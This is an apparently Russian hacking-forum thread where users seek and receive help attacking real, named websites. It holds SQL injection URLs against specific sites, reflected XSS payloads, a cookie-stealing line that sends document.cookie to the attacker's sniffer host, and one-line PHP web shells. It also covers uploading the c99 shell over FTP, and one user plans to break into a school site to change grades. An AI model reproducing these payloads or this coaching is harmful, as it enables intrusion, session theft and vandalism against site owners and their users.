Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Я все делал по статье. все верно.
    Еще выяснил, что при любом запросе:
    админ:админ.
    лол:кол

    выбрасывает на ошибку. Может такое быть, что авторизоваться не получится?
     
  2. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    Warning: require_once(maincore.php) [function.require-once]: failed to open stream: Operation not permitted in /www/hmarka.net/3/8/38school/home/site/news.php on line 12

    Fatal error: require_once() [function.require]: Failed opening required 'maincore.php' (include_path='.:/usr/share/php') in /www/hmarka.net/3/8/38school/home/site/news.php on line 12

    ето че такое и как етим воспользоваться???
     
  3. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    увидеть пути ..
    возрадоватся что ошибки не отключены в этом скрипте, и возможно на всём сайте, что очень облегчит дальнейший взлом..
     
  4. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    круто а вот че мне делать дальш???
     
  5. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    попрыгать на левой ноге, сьесть яйцо в смятку, выпить пол литру молока, подтянутся 23 раза и зайти на php.net и mysql.com .. почитать ..
    также рекомендуется зайти в раздел /forum30.html и тоже почитать ..

    --------
    .зы из ошибки, я понял что это нечто типо сайта школы /38school/
    Не стоит ломать с надеждой поменять себе отметки!
     
    1 person likes this.
  6. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Почитай, может поможет:
    Code:
    http://forum.antichat.ru/thread91807.html
     
  7. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    _http://www.vs.motorolka.ru/forum/index.php?showtopic=-1+limit+1,1+union+select+1,2,3--
    интересует скули такого вида..их ведь так крутить надо?сначала лимит,а потом юбнион+целест?
     
  8. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    да ты прав))) Отметки потом сменю у меня и у всей школе протест!!! Они нас в школе запирают и не выпускают некуда токо после уроков всех(((( Взломаю потом я его задосил с деда)))
     
  9. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    вопрос может не в тему но нужен шел))) на форуме ищу никак ненайду что найду непашут ссылки(( выложите кто-то
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    <?passthru($_GET[cmd]);?>
     
  11. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP:
    <?=@`$c`?>
    short_open_tag и register_globals required=\

    (c) Raz0r ;)
     
    1 person likes this.
  12. serfertty

    serfertty Guest

    Reputations:
    0
    c99comandshell
    http://madnet.name/files/1/10.html
     
  13. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    Вопрос по xss

    Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)

    http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    собственно вставка вместо алерта запроса на снифер,вида

    <script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>

    не пашет((


    В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)

    http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    не работает по ЭТОЙ ссылке xss

    http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    тут всместо alert(document.cookie) просто вставь

    window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;

    тут

    http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    нет xss

    тут

    http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    нет xss

    тут

    http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

    нет xss
     
  15. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    хммм. у меня в IE алерт вылезает по всем ссылкам
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    и что, а у меня опера, xss с расчетом на один браузер - гопота. Ну если так хочется надеятся, что чел, кому ты скинешь ссылку, содержащую пассивную xss, будет именно в осле сидеть, то делай тоже самое:

    вместо alert(document.cookie) просто вставь

    window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;
     
  17. RekRut

    RekRut Elder - Старейшина

    Joined:
    27 Feb 2006
    Messages:
    116
    Likes Received:
    26
    Reputations:
    0
    Помогите с одной проблемой пожалста,

    Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/product.php on line 85

    есть сайт, подобрал к нему колличество колонок, походу правильное потомучто если добавить еще одну ошибка меняется на вот такую

    Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/lib/site_common.php on line 123

    сам запрос выглядит вот так

    http://www.shytobuy.com/product.php?prod_id=1316+union+select+null,null,null,null,null,null,null/*

    проблема в том что сайт не дает добро ни на какое количество колонок, постоянно выводится ошибка, как с этим можно бороться и что вообще можно тут придумать...

    спасибо за ответы
     
  18. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    У меня есть достук к фтп (логин пасс) заливать надо етот шел туда c99comandshell???
     
  19. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    залил а оно не заходит туда(((
    Forbidden
    You don't have permission to access /shell on this server.

    вот че пишет
     
  20. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    права поменяй иль залей в др. папку ..
     
Thread Status:
Not open for further replies.